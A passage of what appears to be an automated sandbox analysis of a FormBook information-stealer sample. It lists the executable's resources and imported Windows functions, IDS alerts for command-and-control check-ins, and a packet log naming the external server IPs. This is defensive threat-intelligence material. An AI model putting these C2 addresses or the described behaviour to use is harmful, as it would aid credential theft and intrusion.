                                                          RT_STRING0xc95180x490dataEnglishGreat Britain0.3715753424657534
                                                          RT_STRING0xc99a80x5fcdataEnglishGreat Britain0.3087467362924282
                                                          RT_STRING0xc9fa40x65cdataEnglishGreat Britain0.34336609336609336
                                                          RT_STRING0xca6000x466dataEnglishGreat Britain0.3605683836589698
                                                          RT_STRING0xcaa680x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                          RT_RCDATA0xcabc00x56863data1.0003273109990605
                                                          RT_GROUP_ICON0x1214240x14dataEnglishGreat Britain1.2
                                                          RT_GROUP_ICON0x1214380x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0x12144c0x14dataEnglishGreat Britain1.15
                                                          RT_GROUP_ICON0x1214600x14dataEnglishGreat Britain1.25
                                                          RT_VERSION0x1214740xdcdataEnglishGreat Britain0.6181818181818182
                                                          RT_MANIFEST0x1215500x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                          Imports

                                                          DLLImport
                                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                          PSAPI.DLLGetProcessMemoryInfo
                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                          UxTheme.dllIsThemeActive
                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishGreat Britain

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2025-01-11T03:32:05.335065+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104997438.47.233.2180TCP
                                                          2025-01-11T03:32:05.335065+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104997438.47.233.2180TCP
                                                          2025-01-11T03:32:21.843289+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049975172.67.137.4780TCP
                                                          2025-01-11T03:32:24.372116+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049976172.67.137.4780TCP
                                                          2025-01-11T03:32:26.972005+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049977172.67.137.4780TCP
                                                          2025-01-11T03:32:29.533346+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049979172.67.137.4780TCP
                                                          2025-01-11T03:32:29.533346+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049979172.67.137.4780TCP
                                                          2025-01-11T03:32:36.425140+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049980206.238.89.11980TCP
                                                          2025-01-11T03:32:38.971900+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049981206.238.89.11980TCP
                                                          2025-01-11T03:32:41.534350+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049982206.238.89.11980TCP
                                                          2025-01-11T03:33:04.000410+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049983206.238.89.11980TCP
                                                          2025-01-11T03:33:04.000410+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049983206.238.89.11980TCP
                                                          2025-01-11T03:33:10.550115+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998466.29.149.4680TCP
                                                          2025-01-11T03:33:12.188505+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998566.29.149.4680TCP
                                                          2025-01-11T03:33:14.741830+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998666.29.149.4680TCP
                                                          2025-01-11T03:33:17.274674+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104998766.29.149.4680TCP
                                                          2025-01-11T03:33:17.274674+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104998766.29.149.4680TCP
                                                          2025-01-11T03:33:22.966175+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049988217.70.184.5080TCP
                                                          2025-01-11T03:33:25.551422+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049989217.70.184.5080TCP
                                                          2025-01-11T03:33:28.071583+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049990217.70.184.5080TCP
                                                          2025-01-11T03:33:30.621345+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049991217.70.184.5080TCP
                                                          2025-01-11T03:33:30.621345+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049991217.70.184.5080TCP
                                                          2025-01-11T03:33:37.057594+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104999213.228.81.3980TCP
                                                          2025-01-11T03:33:39.608449+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104999313.228.81.3980TCP
                                                          2025-01-11T03:33:42.183675+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104999413.228.81.3980TCP
                                                          2025-01-11T03:33:44.702276+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104999513.228.81.3980TCP
                                                          2025-01-11T03:33:44.702276+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104999513.228.81.3980TCP
                                                          2025-01-11T03:33:50.196022+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104999613.248.169.4880TCP
                                                          2025-01-11T03:33:52.749759+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104999713.248.169.4880TCP
                                                          2025-01-11T03:33:55.293008+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104999813.248.169.4880TCP
                                                          2025-01-11T03:34:00.885211+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104999913.248.169.4880TCP
                                                          2025-01-11T03:34:00.885211+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104999913.248.169.4880TCP
                                                          2025-01-11T03:34:07.456560+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050000104.21.64.180TCP
                                                          2025-01-11T03:34:10.004418+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050001104.21.64.180TCP
                                                          2025-01-11T03:34:12.550350+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050002104.21.64.180TCP
                                                          2025-01-11T03:34:15.255213+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1050003104.21.64.180TCP
                                                          2025-01-11T03:34:15.255213+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050003104.21.64.180TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 11, 2025 03:32:04.434438944 CET4997480192.168.2.1038.47.233.21
                                                          Jan 11, 2025 03:32:04.439263105 CET804997438.47.233.21192.168.2.10
                                                          Jan 11, 2025 03:32:04.439358950 CET4997480192.168.2.1038.47.233.21
                                                          Jan 11, 2025 03:32:04.449843884 CET4997480192.168.2.1038.47.233.21
                                                          Jan 11, 2025 03:32:04.454647064 CET804997438.47.233.21192.168.2.10
                                                          Jan 11, 2025 03:32:05.334860086 CET804997438.47.233.21192.168.2.10
                                                          Jan 11, 2025 03:32:05.334981918 CET804997438.47.233.21192.168.2.10
                                                          Jan 11, 2025 03:32:05.335064888 CET4997480192.168.2.1038.47.233.21
                                                          Jan 11, 2025 03:32:05.420438051 CET4997480192.168.2.1038.47.233.21
                                                          Jan 11, 2025 03:32:05.426165104 CET804997438.47.233.21192.168.2.10
                                                          Jan 11, 2025 03:32:20.789053917 CET4997580192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:20.793936968 CET8049975172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:20.794131041 CET4997580192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:20.809668064 CET4997580192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:20.814543009 CET8049975172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:21.841304064 CET8049975172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:21.841816902 CET8049975172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:21.843288898 CET4997580192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:22.315500975 CET4997580192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:23.334183931 CET4997680192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:23.339263916 CET8049976172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:23.339385986 CET4997680192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:23.354429007 CET4997680192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:23.359359026 CET8049976172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:24.371018887 CET8049976172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:24.372013092 CET8049976172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:24.372116089 CET4997680192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:24.863737106 CET4997680192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:25.895467043 CET4997780192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:25.900881052 CET8049977172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:25.900964022 CET4997780192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:25.916013002 CET4997780192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:25.921786070 CET8049977172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:25.922060013 CET8049977172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:26.971700907 CET8049977172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:26.971908092 CET8049977172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:26.972004890 CET4997780192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:27.424885035 CET4997780192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:28.449492931 CET4997980192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:28.454421043 CET8049979172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:28.454518080 CET4997980192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:28.464070082 CET4997980192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:28.468884945 CET8049979172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:29.533134937 CET8049979172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:29.533154011 CET8049979172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:29.533345938 CET4997980192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:29.534416914 CET8049979172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:29.534462929 CET4997980192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:29.536328077 CET4997980192.168.2.10172.67.137.47
                                                          Jan 11, 2025 03:32:29.541239023 CET8049979172.67.137.47192.168.2.10
                                                          Jan 11, 2025 03:32:34.900847912 CET4998080192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:34.905731916 CET8049980206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:32:34.906388044 CET4998080192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:34.921533108 CET4998080192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:34.926534891 CET8049980206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:32:36.425139904 CET4998080192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:36.471013069 CET8049980206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:32:37.449778080 CET4998180192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:37.454802990 CET8049981206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:32:37.454916000 CET4998180192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:37.470510006 CET4998180192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:37.475696087 CET8049981206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:32:38.971899986 CET4998180192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:39.018847942 CET8049981206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:32:40.001581907 CET4998280192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:40.006392956 CET8049982206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:32:40.006465912 CET4998280192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:40.026175976 CET4998280192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:40.031105042 CET8049982206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:32:40.031127930 CET8049982206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:32:41.534349918 CET4998280192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:41.582878113 CET8049982206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:32:42.629148006 CET4998380192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:42.634690046 CET8049983206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:32:42.634762049 CET4998380192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:42.646234989 CET4998380192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:42.651204109 CET8049983206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:32:56.278297901 CET8049980206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:32:56.278435946 CET4998080192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:32:58.840929985 CET8049981206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:32:58.841080904 CET4998180192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:33:01.357501984 CET8049982206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:33:01.357677937 CET4998280192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:33:04.000214100 CET8049983206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:33:04.000410080 CET4998380192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:33:04.001326084 CET4998380192.168.2.10206.238.89.119
                                                          Jan 11, 2025 03:33:04.006242037 CET8049983206.238.89.119192.168.2.10
                                                          Jan 11, 2025 03:33:09.020979881 CET4998480192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:09.026442051 CET804998466.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:09.026550055 CET4998480192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:09.042598009 CET4998480192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:09.048346996 CET804998466.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:10.550115108 CET4998480192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:10.558216095 CET804998466.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:10.560352087 CET4998480192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:11.571729898 CET4998580192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:11.576896906 CET804998566.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:11.576981068 CET4998580192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:11.594050884 CET4998580192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:11.599242926 CET804998566.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:12.188391924 CET804998566.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:12.188457966 CET804998566.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:12.188504934 CET4998580192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:13.096991062 CET4998580192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:14.115951061 CET4998680192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:14.120863914 CET804998666.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:14.120995045 CET4998680192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:14.136616945 CET4998680192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:14.141453028 CET804998666.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:14.141530991 CET804998666.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:14.741681099 CET804998666.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:14.741775036 CET804998666.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:14.741830111 CET4998680192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:15.643826008 CET4998680192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:16.663871050 CET4998780192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:16.668857098 CET804998766.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:16.668930054 CET4998780192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:16.679600954 CET4998780192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:16.685214996 CET804998766.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:17.274293900 CET804998766.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:17.274313927 CET804998766.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:17.274673939 CET4998780192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:17.278436899 CET4998780192.168.2.1066.29.149.46
                                                          Jan 11, 2025 03:33:17.285320044 CET804998766.29.149.46192.168.2.10
                                                          Jan 11, 2025 03:33:22.359188080 CET4998880192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:22.364058971 CET8049988217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:22.364387989 CET4998880192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:22.380213022 CET4998880192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:22.384973049 CET8049988217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:22.966058016 CET8049988217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:22.966119051 CET8049988217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:22.966175079 CET4998880192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:23.893909931 CET4998880192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:24.913022995 CET4998980192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:24.918056965 CET8049989217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:24.918222904 CET4998980192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:24.934149027 CET4998980192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:24.939055920 CET8049989217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:25.551336050 CET8049989217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:25.551363945 CET8049989217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:25.551422119 CET4998980192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:26.440778971 CET4998980192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:27.459939003 CET4999080192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:27.464946032 CET8049990217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:27.465579987 CET4999080192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:27.485584974 CET4999080192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:27.490386963 CET8049990217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:27.490626097 CET8049990217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:28.071480989 CET8049990217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:28.071518898 CET8049990217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:28.071583033 CET4999080192.168.2.10217.70.184.50
